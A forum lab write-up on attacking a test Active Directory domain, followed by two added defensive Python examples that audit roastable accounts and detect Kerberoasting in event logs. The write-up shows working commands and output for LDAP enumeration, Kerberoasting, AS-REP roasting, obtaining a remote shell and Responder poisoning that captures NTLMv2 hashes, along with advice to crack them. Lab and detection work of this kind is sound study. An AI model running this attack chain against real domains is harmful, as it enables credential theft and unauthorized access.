AD Enumeration

xzh

Member
8 Apr 2020
Hello everyone, welcome to my write-up, friend. I wish you good reading and success. If you see anything missing or worth adding in my write-up, please don't forget to let me know. Thanks.
We have 3 VMs in front of us: DC 2019, CLIENT, Kali (attacker).
First, let's run a port scan against the DC.
Code:
nmap -p- -A -T4 192.168.100.111

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-01 14:24 EDT

Nmap scan report for 192.168.100.111

Host is up (0.00093s latency).

Not shown: 65515 filtered ports

PORT      STATE SERVICE      VERSION

53/tcp    open  domain       Simple DNS Plus

88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-01 18:30:41Z)

135/tcp   open  msrpc        Microsoft Windows RPC

139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn

389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: ccc.local, Site: Default-First-Site-Name)

445/tcp   open  microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: CCC)

464/tcp   open  kpasswd5?

593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0

636/tcp   open  tcpwrapped

3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: ccc.local, Site: Default-First-Site-Name)

3269/tcp  open  tcpwrapped

5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

9389/tcp  open  mc-nmf       .NET Message Framing

49666/tcp open  msrpc        Microsoft Windows RPC

49667/tcp open  msrpc        Microsoft Windows RPC

49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0

49670/tcp open  msrpc        Microsoft Windows RPC

49672/tcp open  msrpc        Microsoft Windows RPC

49687/tcp open  msrpc        Microsoft Windows RPC

60646/tcp open  msrpc        Microsoft Windows RPC

MAC Address: 08:00:27:AE:396 (Oracle VirtualBox virtual NIC)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running (JUST GUESSING): Microsoft Windows 2016|2012|Vista|2008|7 (96%)

OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_7

Aggressive OS guesses: Microsoft Windows Server 2016 (96%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 (88%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (87%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

Service Info: Host: SRVDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: mean: 2h24m35s, deviation: 4h02m29s, median: 4m34s

|_nbstat: NetBIOS name: SRVDC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ae:39:d6 (Oracle VirtualBox virtual NIC)

| smb-os-discovery:

|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)

|   Computer name: SRVDC

|   NetBIOS computer name: SRVDC\x00

|   Domain name: ccc.local

|   Forest name: ccc.local

|   FQDN: SRVDC.ccc.local

|_  System time: 2021-09-01T11:31:34-07:00

| smb-security-mode:

|   account_used: guest

|   authentication_level: user

|   challenge_response: supported

|_  message_signing: required

| smb2-security-mode:

|   2.02:

|_    Message signing enabled and required

| smb2-time:

|   date: 2021-09-01T18:31:33

|_  start_date: 2021-09-01T17:33:59
TRACEROUTE
HOP RTT     ADDRESS
1   0.93 ms 192.168.100.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.18 seconds
To do any enumeration at all we need a user account. However, in some scenarios you may find that anonymous binds over LDAP are allowed.
PS: In ADSI Edit > Services > Windows NT > Directory Service, set dSHeuristics to 000002.
Now let's test whether an anonymous bind is possible.
Code:
ldapsearch -x -h 192.168.100.101 -b "DC=ccc,DC=local"
# extended LDIF
#
# LDAPv3
# base <> (default) with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
# numResponses: 1
After this step, if ANONYMOUS LOGON is not present on the system, it must be added as well.
Let's make a few attempts with another tool (git clone it from GitHub).

Code:
python3 windapsearch.py -U --dc-ip 192.168.100.101
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 192.168.100.101
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=ccc,DC=local
[+] Attempting bind
[+]     ...success! Binded as:
[+]      None
[+] Enumerating all AD users
[!] Error retrieving users
[!] {'desc': 'Operations error', 'info': '000004DC: LdapErr: DSID-0C0909AF, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839'}
That is how you can attempt an anonymous bind.

Kerberoasting is an attack technique used to crack the passwords of service accounts. Kerberoasting can be used to gain access to services, to escalate rights and privileges on the target system, and to establish persistence on the target system. The attribute we are actually interested in here is the SPN.

serviceclass/host:port.
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04 Distributed File System Replication

SPNs: you can see more details here.
There are many services; I just don't want to muddle things or reduce readability.


Code:
python3 windapsearch.py -U --user-spns --dc-ip 192.168.100.101 -u [email protected] -p Şifrem (I set a personal password to satisfy the policy)
[+] Using Domain Controller at: 192.168.100.101
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=ccc,DC=local
[+] Attempting bind
[+]     ...success! Binded as:
[+]      u:CCC\alice
[+] Enumerating all AD users
[+]     Found 8 users
cn: Administrator
cn: Guest
cn: DefaultAccount
cn: krbtgt
cn: Alice Princess
userPrincipalName: [email protected]
cn: Shrek Shrek
userPrincipalName: [email protected]
cn: Mark Man
userPrincipalName: [email protected]
cn: SQL Database
userPrincipalName: [email protected]
[+] Attempting to enumerate all User objects with SPNs
[+]     Found 1 Users with SPNs:
CN=SQL Database,CN=Users,DC=ccc,DC=local
[*] Bye!
We have a great password, of course; this is a scenario that is very hard to pull off in practice. A system like this kicks in right away. But we are trying to learn this work. We are trying to understand how we can manage it. Let's continue...
Code:
─# python3 sss  -request -dc-ip 192.168.100.101 ccc.local/administrator
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName              Name         MemberOf                                                 PasswordLastSet             LastLogon  Delegation
--------------------------------  -----------  -------------------------------------------------------  --------------------------  ---------  ----------
SRVDC/sqldatabase.ccc.local:1337  sqldatabase  CN=Group Policy Creator Owners,CN=Users,DC=ccc,DC=local  2021-09-01 13:45:05.665182  <never>       
$krb5tgs$23$*sqldatabase$CCC.LOCAL$ccc.local/sqldatabase*$2d903a5247d3c1fef115526868e07924$...
You can crack the hash with John, but since I know my password I'm not doing it. Now we can log in.
Code:
└─# python3 ddd.py ccc/administrator:[email protected]
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
AS-REP:
Put simply, it is a system that performs authorization over the network. It is a ticket-based system. Tickets, not passwords, are used in the traffic that flows over the network.
Code:
python3 jjj.py ccc.local/administrator -request
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
Password:
Name      MemberOf                                     PasswordLastSet             LastLogon  UAC
--------  -------------------------------------------  --------------------------  ---------  --------
Administrator  CN=Adminstrator,CN=Users,DC=ccc,DC=local  2021-07-21 06:45:46.182240  <never>    0x410200
[email protected]:7f9c1e197d5e5e4b5944e68427c83d71$fbc33d008b8564a4a69c06be4dbddaba01a65b316a94102df96b59bc1bbeb7c99022e4f2229721010f22032abbf42e9dcda42352eb140bf2998b6dfcd5dfb9d25089e3a1cbbbd29ee9ad84523bcf68541c965d4c79589492c93b33b74395b427e9063be7b9e507d51cb02911e37d38013794f6381fd47ecd3180d6a50a15d297925c8d9615829ff49a5644c93b72c0674f700d1cce27f39d704de0d436a4b644559fd7636db8c9ce9cee2f86ccab8e2fdd7afd1aa76406120a7df2a602f722d0d2790666fdbd20f9c4316186f9783bce61807c2bd9dfa07bf965330ec98ce3da8aa55f1d27cbed996d46
You can crack the hash with John.
Code:
responder -I eth0 -rdwv
                                      __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0
  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]
[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.100.201]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']
[+] Current Session Variables:
    Responder Machine Name     [WIN-TUWG92WLJ8N]
    Responder Domain Name      [2N0L.LOCAL]
    Responder DCE-RPC Port     [46021]
[+] Listening for events...                                                                                                                                                                                                        
[*] [NBT-NS] Poisoned answer sent to 192.168.100.101 for name (service: File Server)
[*] [LLMNR]  Poisoned answer sent to 192.168.100.101 for name
[*] [LLMNR]  Poisoned answer sent to 192.168.100.101 for name
[SMB] NTLMv2-SSP Client   : 192.168.100.101
[SMB] NTLMv2-SSP Username : CCC\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::CCC:f2501f1d591a27d...
You can crack the captured hash with John.
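As an added example (not part of xzh's write-up or of any tool shown in it), the following Python audit looks at the same facts from the defender's side: it decodes userAccountControl (the 0x410200 value shown for Administrator above) and lists which accounts are Kerberoastable (SPN on a user account, like sqldatabase) or AS-REP roastable (DONT_REQ_PREAUTH). The account records are constructed from the output above; the Administrator group membership and the SRVDC$ record are assumptions.

```python
"""Audit AD user objects for Kerberoast / AS-REP roast exposure.
Added example; the records below are constructed from the windapsearch
and GetUserSPNs-style output in the write-up, not pulled from a live DC.
"""
from dataclasses import dataclass, field

# userAccountControl bits (subset) as documented by Microsoft for AD
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWD",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE, DONT_REQ_PREAUTH = 0x0002, 0x400000

# LDAP filters equivalent to what audit() computes locally (samAccountType
# 805306368 = user objects; the OID is the bitwise-AND matching rule)
KERBEROASTABLE_FILTER = "(&(samAccountType=805306368)(servicePrincipalName=*)(!(sAMAccountName=krbtgt)))"
ASREP_ROASTABLE_FILTER = "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

PRIVILEGED_GROUPS = {"Domain Admins", "Administrators", "Group Policy Creator Owners"}


@dataclass
class AdUser:
    sam: str
    uac: int
    spns: list = field(default_factory=list)
    member_of: list = field(default_factory=list)  # group DNs


def decode_uac(uac: int) -> list:
    """Expand a userAccountControl value into flag names (e.g. 0x410200 above)."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if uac & bit]


def group_cn(dn: str) -> str:
    """First RDN value of a DN: 'CN=Domain Admins,CN=Users,...' -> 'Domain Admins'."""
    return dn.split(",")[0].split("=", 1)[1]


def is_kerberoastable(u: AdUser) -> bool:
    # An enabled *user* account with an SPN: any domain user can request its
    # service ticket, which is encrypted under that account's password key.
    return (bool(u.spns) and not u.sam.endswith("$")
            and not (u.uac & ACCOUNTDISABLE) and u.sam.lower() != "krbtgt")


def is_asrep_roastable(u: AdUser) -> bool:
    # No pre-auth means the AS-REP (encrypted with the user's key) is handed
    # to anyone who asks for it, which is what GetNPUsers-style tools collect.
    return bool(u.uac & DONT_REQ_PREAUTH) and not (u.uac & ACCOUNTDISABLE)


def audit(users: list) -> dict:
    findings = {}
    for u in users:
        issues = []
        if is_kerberoastable(u):
            issues.append("kerberoastable: SPN on a user account")
        if is_asrep_roastable(u):
            issues.append("asrep-roastable: DONT_REQ_PREAUTH set")
        if issues and PRIVILEGED_GROUPS & {group_cn(g) for g in u.member_of}:
            issues.append("privileged group membership raises impact")
        if issues:
            findings[u.sam] = issues
    return findings


SAMPLE_USERS = [  # constructed from the write-up's output; memberships assumed
    AdUser("Administrator", 0x410200, member_of=["CN=Domain Admins,CN=Users,DC=ccc,DC=local"]),
    AdUser("krbtgt", 0x202, spns=["kadmin/changepw"]),          # disabled by default
    AdUser("alice", 0x10200),
    AdUser("sqldatabase", 0x10200, spns=["SRVDC/sqldatabase.ccc.local:1337"],
           member_of=["CN=Group Policy Creator Owners,CN=Users,DC=ccc,DC=local"]),
    AdUser("SRVDC$", 0x82000, spns=["HOST/SRVDC.ccc.local", "ldap/SRVDC.ccc.local"]),
]

if __name__ == "__main__":
    for sam, issues in audit(SAMPLE_USERS).items():
        print(sam, issues)
```

The fix for both findings is the same in spirit: long random passwords (or a group Managed Service Account) for SPN-bearing accounts, AES-only Kerberos where possible, and clearing DONT_REQ_PREAUTH unless an application really needs it.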

'The Wolf

Senior Member
22 Apr 2021
Tanrı dağı
Well done..
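A further added example, again not from the write-up above, for the detection side of its Kerberoasting and AS-REP sections: the 23 in $krb5tgs$23$ is the Kerberos etype (RC4-HMAC, logged as 0x17), so Security events 4769 (service ticket) and 4768 (TGT, with PreAuthType 0 for accounts that skip pre-authentication) carrying that etype are what a SOC should alert on. The events are constructed to mirror the lab (CCC.LOCAL, sqldatabase, Administrator); the requester IP 192.168.100.201 is assumed to be the Kali host.

```python
"""Detect Kerberoasting / AS-REP roasting indicators in Windows Security events.
Added example: the events are constructed to mirror the write-up's lab
(domain CCC.LOCAL, DC SRVDC, service account sqldatabase); the requester
IP 192.168.100.201 is assumed to be the attacker box.
"""
from collections import defaultdict

# etype 23 = RC4-HMAC: the "23" in $krb5tgs$23$; logged as 0x17 in 4768/4769
RC4_HMAC = "0x17"


def _service_is_user_spn(service_name: str) -> bool:
    """Machine accounts end in '$'; krbtgt tickets are TGTs, not service tickets."""
    name = service_name.split("@")[0].lower()
    return not name.endswith("$") and name != "krbtgt"


def _ip(event: dict) -> str:
    return event["IpAddress"].replace("::ffff:", "")  # 4768/4769 log IPv4-mapped addresses


def detect_kerberoast(events: list, min_services: int = 1) -> list:
    """Event 4769: a principal requesting RC4 service tickets for user-held SPNs.
    Clients rarely ask for RC4 when AES is available, and a user account with
    an SPN (like sqldatabase above) is exactly the roastable case. In
    production run this per requester over a time window and tune min_services."""
    services = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        if e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if not _service_is_user_spn(e["ServiceName"]):
            continue
        services[(e["TargetUserName"], _ip(e))].add(e["ServiceName"])
    return [{"type": "kerberoast", "requester": who, "ip": ip, "services": sorted(s)}
            for (who, ip), s in services.items() if len(s) >= min_services]


def detect_asrep_roast(events: list) -> list:
    """Event 4768: TGT issued with PreAuthType 0 (no pre-auth) and RC4.
    This is the DONT_REQ_PREAUTH case (UAC 0x410200) seen for Administrator above."""
    return [{"type": "asrep-roast", "account": e["TargetUserName"], "ip": _ip(e)}
            for e in events
            if e.get("EventID") == 4768 and e.get("Status") == "0x0"
            and e.get("PreAuthType") == "0"
            and e.get("TicketEncryptionType") == RC4_HMAC]


SAMPLE_EVENTS = [  # constructed, fields named as in the Security log XML
    {"EventID": 4769, "TargetUserName": "alice@CCC.LOCAL", "ServiceName": "sqldatabase",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.100.201"},
    {"EventID": 4769, "TargetUserName": "alice@CCC.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.100.201"},
    {"EventID": 4769, "TargetUserName": "SRVDC$@CCC.LOCAL", "ServiceName": "SRVDC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:192.168.100.101"},
    {"EventID": 4768, "TargetUserName": "Administrator", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.100.201"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:192.168.100.110"},
]

if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS) + detect_asrep_roast(SAMPLE_EVENTS):
        print(alert)
```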
